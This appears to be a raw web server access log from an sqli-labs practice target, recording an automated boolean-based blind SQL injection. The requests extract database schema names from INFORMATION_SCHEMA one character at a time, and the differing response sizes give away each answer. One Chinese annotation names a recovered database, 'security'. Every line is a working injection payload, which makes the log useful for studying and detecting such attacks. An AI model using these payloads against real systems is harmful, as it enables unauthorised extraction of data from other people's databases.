10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),10,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),10,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),10,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),10,1))>98 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),10,1))>99 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),11,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),11,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),11,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),11,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),11,1))>102 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),11,1))>101 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>48 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>72 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>84 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>90 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>93 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>94 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),12,1))>95 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),13,1))>64 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),13,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),13,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),13,1))>120 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),13,1))>116 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),13,1))>114 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),13,1))>115 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),14,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),14,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),14,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),14,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),14,1))>98 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),14,1))>99 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),15,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),15,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),15,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),15,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),15,1))>102 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),15,1))>103 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),16,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),16,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),16,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),16,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),16,1))>102 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),16,1))>101 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),17,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),17,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),17,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),17,1))>108 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),17,1))>110 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),17,1))>109 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),18,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),18,1))>112 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),18,1))>104 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),18,1))>100 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),18,1))>98 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),18,1))>97 AND 'TQAR'='TQAR HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),19,1))>96 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),19,1))>48 AND 'TQAR'='TQAR HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),19,1))>1 AND 'TQAR'='TQAR HTTP/1.1" 200 670

security 数据库

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),1,1))>64 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),1,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),1,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),1,1))>120 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),1,1))>116 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),1,1))>114 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),1,1))>115 AND 'GsZM'='GsZM HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),2,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),2,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),2,1))>104 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),2,1))>100 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),2,1))>102 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),2,1))>101 AND 'GsZM'='GsZM HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),3,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),3,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),3,1))>104 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),3,1))>100 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),3,1))>98 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),3,1))>99 AND 'GsZM'='GsZM HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),4,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),4,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),4,1))>120 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),4,1))>116 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),4,1))>118 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),4,1))>117 AND 'GsZM'='GsZM HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),5,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),5,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),5,1))>120 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),5,1))>116 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),5,1))>114 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),5,1))>113 AND 'GsZM'='GsZM HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),6,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),6,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 670
